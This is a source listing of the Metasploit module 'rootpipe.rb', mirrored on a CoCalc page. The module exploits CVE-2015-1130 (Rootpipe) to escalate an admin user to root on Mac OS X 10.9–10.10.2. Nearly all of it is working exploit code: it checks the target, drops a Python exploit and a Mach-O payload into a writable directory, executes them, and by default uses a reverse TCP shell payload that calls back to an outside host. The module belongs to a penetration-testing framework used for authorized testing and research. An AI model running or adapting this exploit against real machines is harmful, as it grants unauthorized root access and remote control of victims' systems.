CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/osx/local/rootpipe.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Local6Rank = GreatRanking78include Msf::Post::File9include Msf::Post::OSX::Priv10include Msf::Post::OSX::System11include Msf::Exploit::EXE12include Msf::Exploit::FileDropper1314def initialize(info = {})15super(update_info(info,16'Name' => 'Apple OS X Rootpipe Privilege Escalation',17'Description' => %q{18This module exploits a hidden backdoor API in Apple's Admin framework on19Mac OS X to escalate privileges to root, dubbed "Rootpipe."2021This module was tested on Yosemite 10.10.2 and should work on previous versions.2223The patch for this issue was not backported to older releases.2425Note: you must run this exploit as an admin user to escalate to root.26},27'Author' => [28'Emil Kvarnhammar', # Vulnerability discovery and PoC29'joev', # Copy/paste monkey30'wvu' # Meta copy/paste monkey31],32'References' => [33['CVE', '2015-1130'],34['OSVDB', '114114'],35['EDB', '36692'],36['URL', 'https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x/']37],38'DisclosureDate' => '2015-04-09',39'License' => MSF_LICENSE,40'Platform' => 'osx',41'Arch' => ARCH_X64,42'SessionTypes' => ['shell'],43'Privileged' => true,44'Targets' => [45['Mac OS X 10.9-10.10.2', {}]46],47'DefaultTarget' => 0,48'DefaultOptions' => {49'PAYLOAD' => 'osx/x64/shell_reverse_tcp',50'PrependSetreuid' => true51}52))5354register_options [55OptString.new('PYTHON', [true, 'Python executable', '/usr/bin/python'])56]57register_advanced_options [58OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])59]60end6162def base_dir63datastore['WritableDir'].to_s64end6566def check67(ver? && is_admin?) ? CheckCode::Appears : CheckCode::Safe68end6970def exploit71if is_root?72fail_with Failure::BadConfig, 'Session already has root privileges'73end7475unless is_admin?76fail_with Failure::NoAccess, "User is not in the 'admin' group, bailing."77end7879if check != CheckCode::Appears80fail_with Failure::NotVulnerable, 'Target is not vulnerable'81end8283unless writable? base_dir84fail_with Failure::BadConfig, "#{base_dir} is not writable"85end8687print_status("Writing exploit to `#{exploit_file}'")88write_file(exploit_file, python_exploit)89register_file_for_cleanup(exploit_file)9091print_status("Writing payload to `#{payload_file}'")92write_file(payload_file, binary_payload)93register_file_for_cleanup(payload_file)9495print_status('Executing exploit...')96cmd_exec(sploit)97print_status('Executing payload...')98cmd_exec(payload_file)99end100101def ver?102Rex::Version.new(get_sysinfo['ProductVersion']).between?(103Rex::Version.new('10.9'), Rex::Version.new('10.10.2')104)105end106107def sploit108"#{datastore['PYTHON']} #{exploit_file} #{payload_file} #{payload_file}"109end110111def python_exploit112File.read(File.join(113Msf::Config.data_directory, 'exploits', 'CVE-2015-1130', 'exploit.py'114))115end116117def binary_payload118Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)119end120121def exploit_file122@exploit_file ||= "#{base_dir}/#{Rex::Text.rand_text_alpha(8)}"123end124125def payload_file126@payload_file ||= "#{base_dir}/#{Rex::Text.rand_text_alpha(8)}"127end128end129130131